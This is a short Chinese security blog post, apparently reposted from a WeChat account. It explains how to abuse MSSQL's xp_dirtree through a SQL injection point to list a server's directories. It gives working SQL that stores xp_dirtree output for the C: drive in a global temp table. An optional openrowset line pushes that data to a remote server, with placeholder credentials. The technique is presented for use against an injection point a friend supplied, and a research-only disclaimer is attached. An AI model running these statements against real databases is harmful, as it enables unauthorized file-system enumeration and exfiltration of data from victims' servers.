朋友给我一个注入点,开启了xp_cmdshell、xp_dirtree,因为权限不够,执行命令都是失败了,我只是整理下了xp_dirtree利用方式的四句话!
-建立一个临时表,一般的表我们是无办法建立的,我们只能建立临时表
create table ##nonamed(dir ntext,num int)
-调用存储过程把执行回来的数据存到临时表里面
insert ##nonamed execute master..xp_dirtree 'c:',1
--然后采用openrowset函数把临时表的数据导到本地MSSQL 的dirtree表里面了
可不需要:insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select * from Northwind.dbo.dirtree')
select * from ##nonamed
以上方法,也就是说public可以遍历用户服务器的目录 具体有什么利用价值嘛~呵呵见仁见智了
本文始发于微信公众号(LemonSec):xp_dirtree利用方法
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论